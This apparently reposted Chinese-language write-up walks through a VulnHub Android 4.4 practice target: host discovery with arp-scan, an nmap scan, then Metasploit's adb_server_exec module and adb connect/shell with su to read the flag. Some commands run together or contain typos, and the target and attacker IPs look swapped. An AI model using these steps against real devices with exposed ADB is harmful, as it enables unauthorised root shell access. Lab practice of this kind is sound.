渗透测试靶机搭建_对vulnhub中Android4靶机渗透测试全过程!
Android4靶機簡介
名稱:Android4
操作系統:Android v4.4
標志:/data/root/(在此目錄中)
等級:初學者。
下載鏈接:Android4:https://download.vulnhub.com/android4/Android4.ova
搭建成功的Android平臺
知識點
滲透過程
1:獲取IP地址
使用命令:arp-scan -l
由此我們可以看到靶機的IP地址:192.168.232.146
2:掃描開放端口
在此掃描中,我們將使用最流行的工具nmap進行全端激進掃描
使用命令:nmap -p- -A 192.168.232.146
由此我確定存在與端口8080相關的某種網頁。
沒有任何延遲,我打開了網頁,但什么也沒找到。
大多數人都會確定使用POST方法涉及某種語言篡改。我也嘗試過,但沒有發現任何有用的東西。
在嘗試了一些其他方法(PHP CLI和Dropbear RCE)之后,我發現了一種比較好的方法
關于PHP CLI的漏洞掃描:searchsploit -w php cli(關于searchsploit的使用方法:記一次在實戰靶機中使用SearchSploit的總結)
我試過PHP CLI和Dropbear RCE之后發現Dropbear的掃描會得到有用的信息
Android Debug Bridge(adb)是一個多功能的命令行工具,可讓您與設備進行通信(關于adb的使用方法:adb使用-詳細教程(Awesome Adb))
adb命令可以促進各種設備操作,例如安裝和調試應用程序,并且可以訪問可用于在設備上運行各種命令的Unix shell。
它是一個客戶端 - 服務器程序,包括三個組件
1:發送命令的客戶端。客戶端在您的開發計算機上運行。您可以通過發出adb命令從命令行終端調用客戶端。2:一個守護程序(adbd),它在設備上運行命令。守護程序在每個設備上作為后臺進程運行。3:服務器,用于管理客戶端和守護程序之間的通信。服務器作為開發計算機上的后臺進程運行。如果您沒有安裝adb,可以通過sudo apt-get install adb安裝它
sudo apt-get install abd要啟動ADB服務器,我們使用了metasploit:
首先:啟動metasploit
msfconsole地端口很可能不接受連接。在這種情況下,我們將默認端口從4444更改為3333
use exploit/android/adb/adb_server_execset RHOST 192.168.232.145set LHOST 192.168.232.146set LPORT 3333exploit接下來就是需要使用adb
只要上面狀態顯示“正在連接到設備”,在新的終端窗口上鍵入命令:
adb connect 192.168.232.146:5555adb shell我們查看一下密碼:
并沒有發現什么有用的內容
去defaullt目錄:
suidls在/data目錄中,我們找到了一個名為“root”的文件夾
cd /datals最后一步是成功得到答案:
cd /rootlscat flag.txt總結
以上是生活随笔為你收集整理的渗透测试靶机搭建_对vulnhub中Android4靶机渗透测试全过程!的全部內容,希望文章能夠幫你解決所遇到的問題。
- 上一篇: 时间复杂度为on的排序算法_排序算法am
- 下一篇: 函数 php_PHP回调函数及匿名函数概